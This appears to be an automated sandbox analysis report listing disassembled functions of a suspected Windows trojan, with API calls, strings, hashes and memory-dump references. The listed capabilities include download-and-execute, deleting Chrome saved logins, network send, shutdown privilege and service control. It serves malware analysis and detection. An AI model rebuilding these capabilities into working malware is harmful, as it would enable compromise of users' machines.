                                Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                • API String ID: 2127411465-314212984
                                • Opcode ID: a3b7fbba833efc0f4fce898d8377e914d25a7ac951b7d1673c522a71b081ca3f
                                • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                • Opcode Fuzzy Hash: a3b7fbba833efc0f4fce898d8377e914d25a7ac951b7d1673c522a71b081ca3f
                                • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00449212
                                • _free.LIBCMT ref: 00449236
                                • _free.LIBCMT ref: 004493BD
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                • _free.LIBCMT ref: 00449589
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                • String ID:
                                • API String ID: 314583886-0
                                • Opcode ID: 9a4a29a95fdf449062c48f6955f9d0fad93806c2e8219aa4180f52e5cd87d69f
                                • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                • Opcode Fuzzy Hash: 9a4a29a95fdf449062c48f6955f9d0fad93806c2e8219aa4180f52e5cd87d69f
                                • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00406EB0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 222filenetworkCOMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DownloadExecuteFileShell
                                • String ID: aF$ aF$C:\Users\user\Desktop\xi0TpAxHGMsm.exe$open
                                • API String ID: 2825088817-2247774112
                                • Opcode ID: 8e6771980d26f06dde79b1c2195353846b6039bebb286fc27b7708dcf4040b2d
                                • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                • Opcode Fuzzy Hash: 8e6771980d26f06dde79b1c2195353846b6039bebb286fc27b7708dcf4040b2d
                                • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040880C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186fileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00408811
                                • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                • String ID: hdF
                                • API String ID: 1771804793-665520524
                                • Opcode ID: 390627094965f1798e55e015da18b83244ade312cf37f9ca5738f400f7c59cf5
                                • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                • Opcode Fuzzy Hash: 390627094965f1798e55e015da18b83244ade312cf37f9ca5738f400f7c59cf5
                                • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                  • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                  • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                  • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                  • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                • API String ID: 1589313981-2876530381
                                • Opcode ID: 92c4e1930643fd60559c47029e1995f9e25ffa367208d9490e87b7946a8dd321
                                • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                • Opcode Fuzzy Hash: 92c4e1930643fd60559c47029e1995f9e25ffa367208d9490e87b7946a8dd321
                                • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: ACP$OCP$['E
                                • API String ID: 2299586839-2532616801
                                • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                • GetLastError.KERNEL32 ref: 0040BA58
                                Strings
                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                • [Chrome StoredLogins not found], xrefs: 0040BA72
                                • UserProfile, xrefs: 0040BA1E
                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                • API String ID: 2018770650-1062637481
                                • Opcode ID: 7df5978969732fb09709de34775d6ce1a623c26fc4145e618767f27fcf07f662
                                • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                • Opcode Fuzzy Hash: 7df5978969732fb09709de34775d6ce1a623c26fc4145e618767f27fcf07f662
                                • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                • GetLastError.KERNEL32 ref: 0041799D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID: SeShutdownPrivilege
                                • API String ID: 3534403312-3733053543
                                • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00454159 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: __floor_pentium4
                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                • API String ID: 4168288129-2761157908
                                • Opcode ID: df2971786bbf8e496eef17942e665dfb4286cfe499c735b5cf4645abbbd9631d
                                • Instruction ID: adbfc57a6ba9eb8fd61ef87ee4788d0f45260f030e03b769905361500cdb2a19
                                • Opcode Fuzzy Hash: df2971786bbf8e496eef17942e665dfb4286cfe499c735b5cf4645abbbd9631d
                                • Instruction Fuzzy Hash: EBC26E71E046288FDB25CE28DD407EAB3B5EB85306F1541EBD80DE7241E778AE898F45
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00409258
                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                • FindClose.KERNEL32(00000000), ref: 004093C1
                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                  • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                • FindClose.KERNEL32(00000000), ref: 004095B9
                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                • String ID:
                                • API String ID: 1824512719-0
                                • Opcode ID: 9c630c7401a626c7222823fbff663f7013c51d1402800f2316400fa3dda2cb01
                                • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                • Opcode Fuzzy Hash: 9c630c7401a626c7222823fbff663f7013c51d1402800f2316400fa3dda2cb01
                                • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ManagerStart
                                • String ID:
                                • API String ID: 276877138-0
                                • Opcode ID: 38ff3efd75794608fc7efc6ab14161dff6b0215efc9cafdd27725548e5e732cb
                                • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                • Opcode Fuzzy Hash: 38ff3efd75794608fc7efc6ab14161dff6b0215efc9cafdd27725548e5e732cb
                                • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00451CD8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                • _wcschr.LIBVCRUNTIME ref: 00451E58
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                • String ID: sJD
                                • API String ID: 4212172061-3536923933
                                • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040783C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$FirstNextsend
                                • String ID: (eF$XPG$XPG
                                • API String ID: 4113138495-1496965907
                                • Opcode ID: 0ee990551136ebbbbd4efb79b9626d6c73b3c9f9a78fbc4ad3dd3101d052f1d5
                                • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                • Opcode Fuzzy Hash: 0ee990551136ebbbbd4efb79b9626d6c73b3c9f9a78fbc4ad3dd3101d052f1d5
                                • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                Download Yara Rule
                                APIs
                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID: SETTINGS
                                • API String ID: 3473537107-594951305
                                • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                Download Yara Rule
                                APIs
